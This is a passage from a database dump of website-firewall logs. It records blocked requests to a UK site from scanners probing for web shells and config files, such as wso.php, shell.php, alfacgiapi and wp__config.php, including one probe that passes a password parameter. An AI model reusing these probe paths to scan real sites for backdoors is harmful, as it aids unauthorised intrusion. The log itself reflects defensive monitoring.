User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11857,1674439199.348493,1674439199.234700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11858,1674439199.180749,1674439199.073600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11859,1674439199.021508,1674439198.910300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11860,1674439198.857872,1674439198.749700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11861,1674439198.697297,1674439198.580200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11862,1674439198.527998,1674439198.418700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11863,1674439198.366174,1674439198.248700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11864,1674439198.196403,1674439198.083400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11865,1674439198.030926,1674439197.918000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11866,1674439197.865798,1674439197.748200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11867,1674439197.695988,1674439197.581700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11868,1674439197.528006,1674439197.408500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11869,1674439197.355612,1674439197.240500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11870,1674439197.165059,1674439197.032200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11871,1674439092.068819,1674439091.953100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11872,1674439091.766983,1674439091.637200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11873,1674439091.425694,1674439091.314900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11874,1674439091.125877,1674439091.004600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11875,1674439090.778384,1674439090.668700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11876,1674439090.468523,1674439090.341200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11877,1674439089.870239,1674439089.758300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11878,1674439089.572225,1674439089.455300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11879,1674439089.260373,1674439089.149800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11880,1674439088.970853,1674439088.860000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11881,1674439088.661630,1674439088.553800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11882,1674439088.360837,1674439088.235000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11883,1674439088.039012,1674439087.928400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11884,1674439087.732852,1674439087.608900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11885,1674439087.418133,1674439087.306500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11886,1674439087.118476,1674439086.998100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11887,1674439086.703313,1674439086.570800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11888,1674439086.393721,1674439086.268200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11889,1674439086.075474,1674439085.963700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11890,1674439085.775992,1674439085.664500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11891,1674439085.474134,1674439085.352800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11892,1674439085.159291,1674439085.043500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11893,1674462360.598423,1674462360.484000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11894,1674462360.300407,1674462360.191900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11895,1674462359.456456,1674462359.335200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11896,1674462359.100207,1674462358.988400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11897,1674462358.784057,1674462358.668900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/wp__config.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3dwX19jb25maWcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11898,1674462358.467806,1674462358.358700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp__config.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwX19jb25maWcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11899,1674462358.170593,1674462358.057100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/wp__config.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvd3BfX2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11900,1674462357.531605,1674462357.402100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11901,1674462356.854580,1674462356.741900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 